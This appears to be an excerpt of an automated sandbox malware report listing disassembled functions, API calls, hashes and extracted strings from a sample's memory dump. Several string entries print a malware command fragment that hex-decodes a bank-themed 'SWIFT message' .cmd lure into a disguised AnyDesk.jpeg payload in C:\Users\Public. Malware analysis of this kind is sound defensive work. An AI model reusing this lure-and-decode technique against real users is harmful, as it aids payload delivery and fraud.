                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3fc9a69654e0999e81974fe8de99eee517e0562fba3467a43d060cf101c8bdc6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21716B32618BC18AEB21EF21DC602EBB7A4FF46789F849135DA4D4BB59DF38D2458710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDBFEC Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 444COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF706EDC6DB), ref: 00007FF706EC58EF
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF706EC084E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • towupper.MSVCRT ref: 00007FF706EDC1C9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EDC31C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF706EDC5CB
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s $%s>$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDes$P<dwj`$PROMPT$Unknown$\$x
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2242554020-3736011297
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8f45b04878c373140482bd9bf728b90acdb964024760a201dc50eba82409da46
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4127E65A1875281EA20BB14AC2417BA3A4FF44FE4FE85235DA6E437E4DF3CE546C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC2B94 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 $EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 0-671101016
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4d2125c1ecaa67cd59dd69a2b973508792c6f1a7df2824e364ffd51823101f0d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99515D24E0C7438AFB14BF20AC342BBAA90BF55B95FC05035D71E4A2A5DF3CA5469770
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC6FB4 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 148COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`$\\.\
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 799470305-1480106071
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8f89f457e5e974f25ae8aed240be47954c3efcee5af9ab1622c6e1307dc4812d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3db15ab557e2e3ffb4c97bc6f2d5bc8e4c2b62e3e7f52a40e25e558ef806ecb4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f89f457e5e974f25ae8aed240be47954c3efcee5af9ab1622c6e1307dc4812d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5251B932A08B8286EF60AF24DC202BAF7A1FF85B64F854535DA0E47794DF3CD5468720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB14E8 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :$P<dwj`$\
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3961617410-776848485
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 19e234b5e15a76cc87d87d26b1c40dcbabb780ebb02299da316765917ecde753
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7219222A0874286E7506B64BD740BBFAA1FF89BA5BC49231D91F43794DF3CD4458621
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB8B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1944892715-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a66102e4018c1b0e4353d172b043d29de28c8b8a374d8e305c45668d0cbcabd6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6B1AF65A0974286EA20BF11AC7117BF6A5FF55B94FC89636CA4E4B3D0EF3CE4418720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDA39C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 111libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: NTDLL.DLL$NtQueryInformationProcess$P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1580871199-1829598055
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c7fa98e7e90ab5c797e0921a17f2bd6ddc7abb066178f05ede1012cb9490a81b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70516271B18B8286EB50AF15EC1027AB7A5FF88B84F885135DA5E47B98DF3CE501C714
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB1F90 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 174COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$EnvironmentVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DIRCMD$P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1405722092-1814592724
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c55531eb54789366c3258dd2569913d9856292727ababeaf9ab1e689f2bac408
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0814B72A18BC18AEB20EF20AC902EE77A4FF48748F945139DB8D57B58DF38D2458710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDEC14 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 920682188-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a1e5131e08feca5547cee2d1f88c231bf885b8bc60576f1ea1a1c0fa656bdbfb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98512836705B858AEB25EF21DC642E9B7A1FF88B88F888135CA4D4B754EF3CD6458710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC0010 Relevance: 13.7, APIs: 9, Instructions: 163fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF706ED849D,?,?,?,00007FF706EDF0C7), ref: 00007FF706EC0045
                                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF706EDF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EC0071
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC0092
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF706EC00A7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC0148
                                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF706EC0181
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 734197835-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7b6f3c44f3bddd5d73f701b162a91d6348028be242adc21f5e4b1d1ef964c9e9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE619235A18792C6E720AB25AC2037BFA91BF45B58F848131D99E43794DF3DA54AC710
